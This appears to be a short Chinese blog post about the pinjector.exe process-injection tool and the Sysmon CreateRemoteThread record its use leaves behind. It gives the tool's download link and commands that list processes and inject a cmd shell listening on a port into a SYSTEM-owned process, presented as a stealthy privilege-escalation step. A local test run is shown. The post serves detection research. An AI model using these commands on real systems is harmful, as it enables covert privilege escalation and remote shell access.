程序注入資料採集,sysmon可以獲得CreateRemoteThread資訊
阿新 • • 發佈:2022-04-19
下載地址:https://www.tarasco.org/security/Process_Injector/processinjector.zip
程序注入(pinjector.exe)提權
程序注入將pinjector注入到使用者的程序裡一起執行,進而同時擁有了對應的許可權。
是一種比較隱蔽的手段,不會建立新的程序,很難發現,但是上傳至目標主機時可能會報毒
從http://www.tarasco.org/security/Process_Injector/ 下載pinjector.exe檔案。
放到主機的c盤根目錄下
Pinjector.exe -l 列出程序,列出的所有程序都可以利用(找system對應許可權的程序)
pinjector.exe -p 456 cmd 5959
我自己本機嘗試:
D:\bonelee\processinjector\Process Injector>pinjector -p 12304 cmd.exe 6688
Privilege Switcher for Win32(Private version)
(c) 2006 Andres Tarasco - [email protected]
[+] Trying to execute cmd.exe to 12304 as: DESKTOP-PTV6LGO \ admin
[+] Code inyected... ; )
使用sysmon採集資料:
CreateRemoteThread detected: RuleName: - UtcTime: 2022-04-19 09:57:20.846 SourceProcessGuid: {7f59fefd-8780-625e-c811-000000002700} SourceProcessId: 3940 SourceImage: D:\bonelee\processinjector\Process Injector\pinjector.exe TargetProcessGuid: {7f59fefd-333e-625e-6f02-000000002700} TargetProcessId: 12304 TargetImage: C:\Program Files (x86)\Notepad++\notepad++.exe NewThreadId: 2224 StartAddress: 0x0000000003900000 StartModule: - StartFunction: - SourceUser: DESKTOP-PTV6LGO\admin TargetUser: DESKTOP-PTV6LGO\admin